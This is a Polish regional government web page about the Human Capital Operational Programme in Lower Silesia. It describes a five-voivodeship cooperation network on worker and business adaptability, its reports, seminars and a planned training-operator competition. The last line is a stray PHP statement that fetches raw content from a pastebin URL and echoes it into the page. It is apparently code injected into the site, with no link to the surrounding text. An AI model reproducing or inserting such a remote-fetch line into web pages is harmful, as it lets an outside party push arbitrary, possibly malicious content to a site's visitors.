Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Ponadregionalna sieć współpracy - adaptacyjność

Projekt stworzenia ponadregionalnej sieci współpracy w obszarze adaptacyjności został przygotowany przez dolnośląską Instytucję Pośredniczącą PO KL w odpowiedzi na konkurs grantowy ogłoszony przez Ministerstwo Rozwoju Regionalnego 30 października 2009 r.

Sieć współpracy, w której Urząd Marszałkowski Województwa Dolnośląskiego pełnił rolę Lidera obejmowała pięć województw: dolnośląskie, zachodniopomorskie, opolskie, śląskie i lubuskie. Sieć tworzyli:

 1. Instytucje Pośredniczące PO KL województw: dolnośląskiego, lubuskiego, zachodniopomorskiego;
 2. Instytucja Pośrednicząca II stopnia – Wojewódzki Urząd Pracy w Opolu;
 3. partnerzy społeczno – gospodarczy zasiadający w Podkomitecie Monitorującym PO KL województwa śląskiego - Polska Izba Firm Szkoleniowych i Podkomitecie Monitorującym PO KL województwa dolnośląskiego reprezentujący pracodawców Związek Pracodawców Dolnego Śląska oraz organizacje pozarządowe: Dolnośląska Federacja Organizacji Pozarządowych i RO EFS we Wrocławiu prowadzony przez Regionalne Centrum Wspierania Inicjatyw Pozarządowych oraz Polską Izbę Firm Szkoleniową.

We wstępnej fazie realizacji projektu (styczeń – maj 2010 r.) na spotkaniu inaugurującym działalność sieci (30 kwietnia br.) zaprezentowana została przygotowana przez Partnerów tzw. „baza zasobów”, czyli m.in. spis organizacji, instytucji i ekspertów działających w obszarze adaptacyjności, dostępnych analiz, prowadzonych badań, dobrych praktyk (projektów konkursowych i systemowych), planowanych wydarzeń (seminariów, konferencji nt. adaptacyjności).

Na podstawie zasobów zgłoszonych przez instytucje i organizacje uczestniczące w Sieci, koordynatorzy zebrali i usystematyzowali informacje o projektach PO KL oraz działaniach podejmowanych w celu wzmocnienia i rozwoju adaptacyjności w przedsiębiorstwach (szkolenia dla pracowników, działania outplacementowe), dostosowania strategii rozwoju gospodarczego do aktualnych wyzwań (zmieniającej się sytuacji na regionalnych i światowych rynkach) oraz określenia standardów partnerstwa ukierunkowanego na wzrost konkurencyjności firm.

Zgromadzone dane zostały poddane analizie eksperckiej (kwiecień – maj 2011). Efektem przeglądów i analiz są raporty zawierające m.in. rekomendacje pomocne we wdrażaniu PO KL w obszarze adaptacyjności (w tym np. dotyczące monitorowania rezultatów, formułowania kryteriów konkursowych, strategii informacyjno – promocyjnych). Przeglądy praktyk w poszczególnych obszarach zostały podsumowane w trakcie dwudniowych spotkań o charakterze seminaryjnym (we Wrocławiu i w Szczecinie). Raporty, będące efektem przeglądów i analiz zostały opublikowane pod koniec maja 2011 r.

Zapraszamy do zapoznania się i korzystania z dokumentu opracowanego przez partnerów współpracujących w ramach ponadregionalnej sieci współpracy, tzw. „bazy zasobów” w zakresie adaptacyjności pracowników i przedsiębiorstw.

Baza zawiera spis organizacji, instytucji i ekspertów, dostępnych analiz, prowadzonych badań, dobrych praktyk (projektów konkursowych i systemowych) z obszaru adaptacyjności realizowanych w partnerskich województwach.

Baza zasobów w zakresie adaptacyjności dokument do pobrania

Rezultatem współpracy Partnerów Sieci były przeprowadzone przeglądy praktyk regionalnych w obszarze adaptacyjności (wrzesień 2010 – luty 2011), realizowanych w trzech zakresach:

 • w „skali makro”(koordynował WUP w Szczecinie),
 • w „skali mikro” (koordynował WUP w Opolu) spotkanie studyjne dot. „skali mikro” i „skali makro” (12-13 maja 2011, Szczecin) - więcej informacji 
 • w obszarze współpracy partnerskiej (koordynował DFOP – partner społeczno-gospodarczy z woj. dolnośląskiego) – spotkanie studyjne (14-15 kwietnia, Wrocław) więcej informacji
 • Raport - Przegląd praktyk współpracy partnerskiej w obszarze adaptacyjności pracownikow i przesiębiorstw - kwiecień 2011 r.
 • Raport - Przegląd praktyk w obszarze adaptacyjności pracowników i przedsiębiorstw w skali mikro i makro - maj 2011 r.
 • Raport końcowy - Ponadregionalna Sieć współpracy w obszarze adaptacyjnosci pracowników i przedsiębiorstw - wrzesień 2011 r.

 

Podczas spotkania studyjnego, 12-13 maja br. w Szczecinie, dot. przeglądu praktyk w obszarze adaptacyjności pracowników i pracodawców w skali mikro i makro w ramach ponadregionalnej sieci współpracy, wypracowany został pomysł na przemodelowanie dotychczasowego sposobu organizacji szkoleń w ramach Działania 8.1 PO KL. Proponowana zmiana polegać miałaby na wprowadzeniu tzw. „operatora”. Pomysł ten został zaprezentowany na seminariach regionalnych (Opole – 9 czerwca, Katowice, - 10 czerwca, Szczecin – 21 czerwca br., Wrocław – 8 września 2011 r., Zielona Góra – 9 września 2011 r.), podczas X posiedzenia Podkomitetu Monitorującego PO KL Województwa Dolnośląskiego (16-17 czerwca br.) oraz podczas konsultacji społecznych Planów działania na rok 2012 na Dolnym Śląsku (11 – 12 lipca br.). Propozycja spotkała się z dużym zainteresowaniem i była przedmiotem wielu dyskusji.

IP Województwa Dolnośląskiego wprowadziła zaproponowane rozwiązanie do Planów działania na rok 2012 dla Priorytetu VIII. W II kwartale 2012 r. ogłoszony zostanie konkurs zamknięty na tzw. „operatorów wsparcia” w ramach Poddziałania 8.1.1 (konkurs A2). Trwają prace nad dokumentacją konkursową, w której udział biorą również partnerzy społeczno-gospodarczy działających w Podkomitecie Monitorującym PO KL.

Plan działania na rok 2012 dla Priorytetu VIII dostępny jest w zakładce: Strona główna / Plany działania / 2012

 

Instytucja Pośrednicząca PO KL w woj. dolnośląskim uczestniczy również jako partner w następujących sieciach współpracy:

 • Sieć współpracy w obszarze rewitalizacji społecznej – wymiana doświadczeń regionów w ramach aktywizacji społeczności lokalnej – rolę lidera pełni Urząd Marszałkowski Województwa Śląskiego;
 • Sieć współpracy - Wrażliwy klient(uczestnik) projektów PO KL – rolę lidera pełni Urząd Marszałkowski Województwa Małopolskiego.
 • Sieć współpracy w obszarze tematycznym - Wybór projektów- rolę lidera pełni Urząd Marszałkowski Województwa Lubuskiego.
 • Sieć współpracy w obszarze badań i analiz oraz ewaluacji interwencji na lokalnym rynku pracy – rolę lidera pełni Wojewódzki Urząd Pracy w Szczecinie.
echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");